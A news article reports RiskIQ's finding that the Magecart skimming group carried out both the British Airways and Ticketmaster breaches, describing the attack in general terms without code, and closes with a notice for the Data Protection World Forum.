Magecart, the credit card skimming group behind the Ticketmaster breach was also behind the British Airways breach, which was confirmed last week, say researchers.
We are detecting “internet-scale threats alerted to new Magecart breaches hourly, a clear indication that the group is extremely active and a very real threat to all organizations offering online payment facilities,” said a statement from RiskIQ issued this week.
Magecart uses “scripts injected into websites to steal data that’s entered into online payment forms on e-commerce sites,” explained RiskIQ back in July. At the time, Magecart was implicated in the Ticketmaster breach, in which payment details held by a third-party supplier to Ticketmaster, known as Inbenta, were stolen.
This time, RiskIQ says that the attack was similar to the one leveled against Ticketmaster but “with one key difference: instead of compromising commonly used third-party functionality to gain access to hundreds of sites at once, Magecart operatives compromised the British Airways site directly and planned their attack around the site’s unique structure and functionality.”
RiskIQ says that its analysis shows that “the functionality of the payment forms on the British Airways’ website were copied and modified to deliver payment information to an attacker-controlled server while maintaining their intended functionality to avoid detection.”
The attackers were also aware of the way the British Airways mobile app was constructed, leveraging the fact that it used much of the same functionality as the web-app and could, therefore, victimise users in the same way.
“This attack is a highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer,” said Yonathan Klijnsma, Head Researcher at RiskIQ. “This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.”
The researchers also found evidence that Magecart operatives may have breached the British Airways site several days before the skimming began. RiskIQ web-crawling data shows that a certificate used on the attacker’s command and control server was issued on August 15th, nearly a week before the reported start date of the attack on August 21st.
The inaugural Data Protection World Forum (DPWF) will be held on November 20th & 21st 2018 at the ExCeL London which will provide a broader focus across the data protection and privacy space amidst the progressive tightening of global data protection laws.
Ahead of the end of year event, DPWF has launched a series of intensive workshops.
Further information on the DPWF and workshop details are available at: https://www.dataprotectionworldforum.com/